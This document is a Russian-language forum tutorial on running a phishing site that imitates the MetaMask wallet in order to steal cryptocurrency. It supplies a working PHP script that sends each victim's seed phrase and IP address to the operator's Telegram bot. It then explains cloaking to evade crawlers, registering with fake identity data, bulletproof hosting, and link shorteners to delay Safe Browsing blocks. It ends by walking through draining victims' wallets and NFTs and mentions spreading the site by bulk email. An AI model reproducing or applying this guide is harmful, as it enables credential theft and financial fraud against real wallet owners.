Заработок на фишинговом сайте «MetaMask»

Итак, сразу к делу.

1) Создаем страницу (HTML, CSS, JS)

Для создания страницы создаем файл с расширением .html и начинаем верстать сайт. Для этого вам понадобятся базовые навыки работы с разметкой и стилями.

Для новичков я предоставил ниже свой проект (ссылка скопирована с школофорума Lolzteam, не несем никакой ответственности за содержимое файлов), который они могут использовать «из коробки». Для отправки логов в телеграм в этом проекте используется фреймворк jquery и язык программировния php.

Обфусцированный js код в конце разметки отвечает за анимированную голову лисицы.

Для работы с этим проектом я использовал Open Server Panel. Вы можете использовать любой другой локальный веб-сервер. Если вы откроете offer.html напрямую, страница не будет корректно отображаться.

Старайтесь избегать ссылок на официальный сайт кошелька Metamask, когда верстаете страницу.

2) Настраиваем логирование в Telegram (получение мнемонических фраз)

Создаем файл test.php (test.php это - наш бэкенд). Вам необходимо будет создать файл с этим названием в папке с вашим проектом. Затем добавляем в test.php код для отправки нам мнемонической фразы и ip адреса пользователя (полностью копируем содержание приведенной внизу рамки), подставляя ваши значения в переменные $botToken и $chatId.

После попадания на главную страницу пользователь вводит мнемоническую фразу, после чего она отправляется к вам в Telegram.

Код PHP:

<?php
ini_set('display_errors', 0);
error_reporting(0);
$message=$_GET['message'];
$remoteIp=$_SERVER['REMOTE_ADDR'];
$botToken= 'токен вашего телеграм бота';
$chatId='ваш id в телеграм(как пользователя)';
$telegramApiUrl="https://api.telegram.org/bot{$botToken}/sendMessage";
$messageData=[
    'chat_id'=>$chatId,
    'text'=>"<code>$remoteIp</code>\n\n<code>$message</code>",
    'parse_mode'=>'html',];
$httpOptions = [
    'http' => [
        'header' => 'Content-Type: application/x-www-form-urlencoded',
        'method' => 'POST',
        'content' => http_build_query($messageData),
    ],
];
$httpContext=stream_context_create($httpOptions);
$response=file_get_contents($telegramApiUrl,false,$httpContext);
if($response===false){
    echo 'Failed to send the message.';
}
else{
    echo 'Message sent successfully.';
}
?>

Для этого заранее создаем телеграм бота для получения логов. Воспользуемся ботом BotFather.

Следуем такому алгоритму.

Дальше выбираем название и придумываем уникальное имя для вашего бота.

Название и уникальное имя необходимо придумать самому. Для корректной работы бота в нашем php файле вам нужен токен, который каждый желающий может получить в телеграм-боте BotFather. На представленной выше картинке он выглядит так: 6490359840:AAENlFYai11AKkbGUe9FAEVDHniH_erzV-o. Вам нужно скопировать свой токен, и присвоить переменной $botToken значение в виде строки, таким образом:

Дальше переходим в переписку с ботом и нажимаем “ЗАПУСТИТЬ”

Следующим шагом, вам необходимо получить свой id пользователя. Для этого воспользуемся телеграм ботом @username_to_id_bot. Вам необходимо запустить бота и он выдаст вам ваш id. Он будет иметь вид числа в таком формате - 5725159211. Помещаем его в переменную $chatId:

3) Создаём белую страницу

Если вам не знакомы эти понятия, то вам пора о них узнать. Оффер - это, непосредственно, наша страница, на которой пользователь имеет удовольствие вводить свою мнемоническую фразу. 

Белая страница - это страница, на которую попадают боты-краулеры, когда попадают на наш сайт.

Давайте создадим белую страницу. Для этого подойдет любой сайт, связанный с вашей тематикой (напр: криптовалюта, блокчейн), либо с доменным именем вашего сайта. Белая страница должна быть страницей чисто информативного характера. Пример такой страницы лежит в директории прикрепленного выше проекта с названием white.html.

Важно учесть, что белую страницу нужно периодически менять, поэтому лучше сверстать ее самому. В крайнем случае заказать. Ничего сложного тут нет, поэтому стоить это будет недорого.

Если вы будете использовать платный сервис для клоакинга - AutoCloaking, то сможете генерировать белые страницы по вашему запросу, прямо в вашем телеграм.

4) Настраиваем клоаку (страницу, для отвода ботов-краулеров)

На этом этапе могу посоветовать AutoCloaking. За символические деньги вы получите подробную инструкцию для настройки вашей клоаки.

Сможете следить за статистикой посещений вашего сайта в режиме реального времени.

Возможность гибкой настройки клоакинга.

А также уникальную возможность генерировать белые страницы прямо в вашем Телеграм.

В качестве бесплатного варианта могу предложить вам сервис Cloaking House.

Если у вас есть опыт работы с клоакингом, можете пропускать этот пункт. Для всех остальных могу предложить Cloaking House. Его настройка проходит легко и понятно. Кроме того Cloaking House имеет бесплатный тестовый период, который длится 10 дней. После этого вы можете создать новый аккаунт и снова начать пробный период. Мультиаккаунт никак не пресекается сервисом. При регистрации вы можете указывать несуществующий телеграм аккаунт, он не будет проверятся сервисом.

После прохождения регистрации на сайте Cloaking House мы попадаем в кабинет.

Нажимаем большую синюю кнопку «Создать поток».

Далее, вводим произвольное название потока (на картинке внизу это - test). В поле White Page пишем название файла белой страницы (на картинке внизу это – white.html) , в поле Offer Page название нашей главной страницы (на картинке внизу это –offer.html) и нажимаем кнопку «Продолжить».

На следующей странице (картинка внизу) активируем пункты “Cloaking” и “Запретить переходы без ISP”. Переходы с vpn не запрещаем, потому что таким образом потеряем людей с включенным vpn.

IPv6 – новая версия интернет протокола, уже используется многими смартфонами, так что пользователей с IPv6 исключать с помощью фильтров не будем. Регуляция переходов без referrer работает на этом сервисе не очень корректно, поэтому этот пункт оставляет неактивным.

Исключать с помощью фильтра вы будете пользователей, которые сделали больше 5 кликов по нашей ссылке в сутки. В основном, так ведут себя только боты, которые ускоряют бан вашего сайта.

Выбираем все страны, устройства, операционные системы и браузеры. В поле “черный список” вы можете выбрать созданный раннее черный список. Создать его можно в главном меню. Вносить туда стоит ip-адреса, которые показались вам подозрительными. Рассматривать черный список подробно мы в этой статье не будем.

Переходим на следующую страницу. Тут необходимо включить настроенный только что клоакинг. В поле “Белый список” вы можете внести ip, к которым не будут применены ваши фильтры. Сюда вы, например, можете внести ваш ip и ip членов вашей команды.

Настройка закончена. Вас автоматически переместит на главную страницу, где вам нужно скачать файл index.php и поместить его в директорию проекта.

5) Настраиваем хостинг

Я использую хостинг Namecheap. Стоит заметить что этот не является лучшим решением для подобного рода сайтов. Будет разумнее использовать оффшорный хостинг (bulletproof), но следует учесть, что он обойдется почти в 2 раза дороже. Однако, стоит добавить, что и bulletproof хостинг не является средством от красного экрана google safebrowsing, хотя и поможет оттянуть его появление.

Если вы тоже захотите , как и я , воспользоваться хостингом Namecheap, то первым делом нужно пройти регистрацию на сайте https://www.namecheap.com/. После регистрации вы попадаете в кабинет , в котором вам нужно выбрать и приобрести доменное имя для вашего сайта. Для того, чтобы перейти в магазин, наводим мышкой на кнопку Domain, и в выпадающем меню выбираем «Domain Name Search».

В поле для ввода помещаем желаемое название для вашего сайта (на картинке это - testforlolz). Это достаточно важный этап! Если вы выберете доменное имя, которое слишком походит на доменное имя оригинального сайта, вы сразу попадете в поле зрения ботов-краулеров. С другой стороны, если вы назовете свой сайт слишком абстрактно, у пользователя скорее всего возникнут сомнения по поводу достоверности этого сайта.

Добавляем домен в корзину, туда же сразу добавляем хостинг, к которому он будет привязан.

Переходим в корзину для оплаты (находится в правом верхнем углу на странице).

В процессе оплаты домена и хостинга может возникнуть потребность внести информацию о себе. Смело можно писать выдуманные данные, проверятся они не будут.

Оплатить можно криптовалютой. В качестве средства оплаты выбираем пункт баланс аккаунта («Account funds» см.) Для этого сперва нужно пополнить баланс. Переходим по ссылке “add funds” (красная стрелка)

Выбираем метод оплаты – оплата с помощью криптовалюты.

Необходимо ввести точную сумму, которая указана в правом верхнем углу экрана сайта на котором мы находимся, то есть вводим суммарную стоимость домена и хостинга. Дальше следуйте инструкциям. Процесс, непосредственно, оплаты интуитивно понятен.

Чтобы научиться загружать файлы вашего сайта на хостинг Namecheap, рекомендую ознакомится с этим видео.

Для того, чтобы избежать преждевременного появления красного окна от google safe browsing, вам нужно настроить сокращатель ссылок. Можно использовать любой. После поступления жалоб, сервис сделает нашу ссылку неактивной, зато наш сайт останется онлайн и нам не нужно будет оплачивать новый хостинг и домен, а также регистрировать все заново.

6) Выжимаем максимум из сидфраз

В нашем телеграм боте мы будем получать логи в таком формате:

Для того, чтобы быстро и детально проверить мнемонику и выжать из нее максимум за короткий срок можно использовать телеграм бот Crypto Locator. Это удобный бот, который проверяет первые несколько дериваций адресов кошельков по поступившей вам мнемонической фразе. Также, этот бот хорош тем, что подсчитывает стоимость всех находящихся на кошельке NFT, которые потом, например, можно продать на сайте Opensea. Для этого нужно подключить кошелек с NFT к сайту Opensea, перейти в свой профиль и продать NFT по существующим офферам.

Пример того, как ботом Crypto Locator будет отображаться информация по криптоактивам , находящимся в кошельке пользователя, приведен ниже на картинке.

Для того, чтобы получить подробный анализ криптоактивов, находящися на кошельках, доступ к которым у вас появился с помощью полученной мнемонической фразы, вы отправляете фразу из лога в этот бот таким образом:

Если несколько дериваций адресов кошельков содержат активы, бот отправит вам результат проверки каждого адреса отдельным сообщением, вместе с приватным ключом от этого кошелька.

После того, как мы получили детальную информацию о активах, мы можем сразу скопировать приватный ключ от кошелька, полученый в сообщении бота и импортировать в свой метамаск для получения доступа к активам.

Внизу , на картинках, вы увидите процесс импорта полученного от бота приватного ключа в ваш метамаск.

В поле, помеченном красной стрелкой, нужно внести приватный ключ, который вам выдал бот Crypto Locator. После чего, если Метамаск сам не подтянул находящиеся на кошельке активы, вам нужно найти адрес контракта актива, который вам выдал бот, например:

После этого вы можете импортировать токен в ваш метамаск следующим образом:

После этого вы можете вывести токен с текущего кошелька на свой кошелек. Старайтесь не использовать в таких случаях внутребиржевые кошельки, потому что это грозит, как минимум, блокировкой вашего аккаунта вместе с активами. Лучше использовать обычные кошельки. Тему очистки нативных монет и токенов мы рассматривать в этой статье не будем.

Итоги

Я использовал в качестве трафика массовую рассылку по email(bulk). Будьте готовы что будет много пустых или почти пустых кошельков. Также часто в логах часто приходят всяческие ругательства. Прикрепляю несколько кошельков, полученных в результате описанной выше деятельности.

Вот мы и закончили. Конечно, самый важный аспект для получения дохода это трафик. В этой статье мы не будем рассматривать тему привлечения посетителей на фишинговый сайт, это фантазия каждого. Чем шире известен способ распространения вашего фишинга, тем сложнее вам будет заработать с его помощью. Будьте креативны, пробуйте проливать по разному.

Всем удачи, друзья!